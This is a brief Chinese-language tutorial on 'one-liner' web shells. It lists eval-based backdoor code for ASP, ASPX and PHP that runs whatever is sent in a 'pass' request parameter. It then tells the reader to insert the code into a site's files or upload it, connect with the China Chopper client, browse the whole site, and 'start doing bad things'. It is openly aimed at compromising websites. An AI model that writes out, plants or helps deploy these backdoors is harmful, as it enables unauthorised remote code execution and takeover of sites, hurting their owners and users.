一句话

asp的一句话是：

<%eval request ("pass")%>

aspx的一句话是：

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句话是：

<?php @eval($_POST['pass']);?>

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上，或者直接创建一个新的文件，在里面写入这些语句，然后把文件上传到网站上即可。


连接到这个网址下我们的菜刀文件上，右键点击文件管理，就可以获取整个网站的目录了～然后就可以开始做坏事。